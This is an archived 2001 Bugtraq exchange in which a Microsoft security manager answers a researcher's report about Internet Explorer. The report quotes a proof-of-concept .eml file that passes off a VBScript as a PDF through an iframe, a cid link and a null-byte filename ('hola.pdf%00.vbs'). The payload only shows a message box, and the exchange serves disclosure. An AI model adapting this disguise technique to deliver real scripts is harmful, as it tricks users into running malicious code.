-----BEGIN PGP SIGNED MESSAGE-----

Hi Jesus -

I'm afraid the situation may not be what you believe. First, your
system is not patched, despite what the dialogue says. The dialogue
is displayed if you try to install the patch on anything other than
IE 5.01 Service Pack 1 or IE 5.5 Service Pack 1, and the text of the
dialogue is incorrect. This error has been present in several recent
IE patches, and we're working to ensure that it's not present in
future ones. Meantime, here's the passage from the bulletin that
discusses it:

        -------- start ----------
        Caveats:
        If the patch is installed on a system running a version of IE
other
than the one it is designed for, an error message will be displayed
saying that the patch is not needed. This message is incorrect, and
customers who see this message should upgrade to a supported version
of IE and re-install the patches.
        -------- end ----------

We checked the code you provided below, and have verified that the
behavior you're seeing is not a vulnerability. Although you're right
that it's possible for a web site to initiate a file download, this
is by-design behavior and is unrelated to the vulnerability discussed
in MS01-020. A Q&A in the FAQ discusses the situation:

        -------- start ----------
        I heard that even after applying this patch, an e-mail could
start a
file download automatically. Is this true?
        Yes. However, this is not related to this vulnerability, and
doesn't
pose a security risk. It's always possible for an e-mail to start a
file download, and of course the author of the mail can give the file
a name that sounds innocuous. However, the file download cannot
actually begin unless and until the user selects a location to which
it should be downloaded, and clicks the OK button.
        As a general rule, it is probably worth questioning the
trustworthiness of any e-mail that automatically starts a file
download. The best action is to simply click the Cancel button in the
dialogue.
        -------- end ----------

Hope that helps explain the situation. Regards,

Scott Culp
Security Program Manager
Microsoft Security Response Center

- -----Original Message-----
From: Jesús López de Aguileta [mailto:aguiletaEUNATE.NET
<mailto:aguiletaEUNATE.NET> ]
Sent: Monday, April 02, 2001 1:12 PM
To: BUGTRAQSECURITYFOCUS.COM
Subject: User may be fooled to execute programs browsing with IE5.1

Hi,

Playing with Cuartango´s recently exploit
(http://www.kriptopolis.com/cua/eml.html
<http://www.kriptopolis.com/cua/eml.html> ) I've found that it´s
possible to trick an user to execute one file making he/she think
it's a data file of any kind (pdf, mpeg,...).

This works on both NT and 2000 using IE 5.1 (other platforms/IE
versions not tested).

I have already downloaded the MS01-20 patch in the systems tested but
both appears to be not vulnerable to Cuartango's exploit (msgbox:
"This update does not need to be installed on your system"), probably
because both have updated Media Player 7 installed.

I think this is a completely different issue and excuse me if it's
previously solved/commented.

Detail:

- --------8<----cut here-------8<

From: "Ripped from Juan Carlos Garcia Cuartango"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
 type="multipart/alternative";
 boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal

- --1
Content-Type: multipart/alternative;
 boundary="2"

- --2
Content-Type: text/html;
 charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff >
<iframe src=3Dcid:donthurtme.pdf height=3D0 width=3D0></iframe>
Done<br> </BODY> </HTML>

- --2--

- --1
Content-Type: application/x-shockwave-flash;
 name="hola.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: <donthurtme.pdf>

msgbox("Hello")

- --1

- --------8<--cut here---------8<

Making an .eml file with the above content and browsing it with IE 5,
displays a window for download or online browse the "FILE" (not
program) "donthurtme.pdf". If the user choose to online browse it,
the VBscript code execute.

Another interesting issue is that, when replacing: mime 1 part with:

- --1
Content-Type: application/xxxx;
 name="hola.pdf%00.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: <donthurtme.pdf>

msgbox("Hello")

- --1

IE truncate in the popup window the name displaying "hola.pdf"
instead of "hola.pdf%00.vbs", making the user thinks that the
extension of the program is different. Notice that in this second
case, IE properly ask for "Run this PROGRAM" or "Save this PROGRAM",
only the extension may confuse the user.

Regards and excuse my poor English.

Jesus Lopez de Aguileta

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.3

iQEVAwUBOskH840ZSRQxA/UrAQFesgf+MMmynejaNFC7Vk3I8yedqxsurHo1AKas
NzaGboFlIUJZF3qIQ/8eOb0ygHIXvRtoUx5fIxEkfuqJP2pWobenvGk+kOsu+4Hf
EtvkOOu3a4afnREosy/HozPTIEVKxWrMR0+yvnlniq8TFaoHeHIBjNRQ/O7fJ6D0
Iu9VB6p3OyhfKMfq/F9PbPwnzprwEue8A3BCrF1RqCoeumFzCCm79pi908S3cRny
a+LBPTmygyYWopwV8TGnpNBGNBEJ1PPVhdezYLgl881FjXdWPmSYEf/88oUddhmq
t/950JyJEFYzncKI4iazuOEdd4wSel7mi2XiXM50sxpdrhXiO8K5BA==
=f1TY
-----END PGP SIGNATURE-----

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]